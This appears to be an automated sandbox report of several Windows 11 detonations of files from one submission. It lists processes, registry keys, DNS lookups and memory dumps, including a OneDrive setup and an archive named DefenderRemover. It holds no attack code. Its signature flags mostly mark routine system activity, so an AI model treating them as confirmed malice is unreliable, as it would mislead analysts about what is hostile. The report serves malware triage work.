"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\bin\Wpf.Ui.xml"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\bin\Wpf.Ui.xml
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
Files
memory/1504-0-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-1-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-2-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-3-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-4-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-5-0x00007FFE3F223000-0x00007FFE3F224000-memory.dmp
memory/1504-6-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-7-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-8-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-9-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-10-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-11-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-13-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-12-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-14-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-15-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-19-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-20-0x00007FFE3F180000-0x00007FFE3F389000-memory.dmp
memory/1504-18-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-17-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
memory/1504-16-0x00007FFDFF210000-0x00007FFDFF220000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
75s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\dbip-country-lite.mmdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
80s
Max time network
96s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\browser-wasm\nativeassets\net8.0\e_sqlite3.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
70s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\ios-arm\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
137s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\runtimes\ios-armv7s\native\libMono.Unix.a
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
77s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\教程\DefenderRemover.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:44
Platform
win11-20240426-en
Max time kernel
330s
Max time network
268s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LOCALSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ThreadingModel = "Both" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_CLASSES\WOW6432NODE\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuthLib.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileCoAuthLib64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
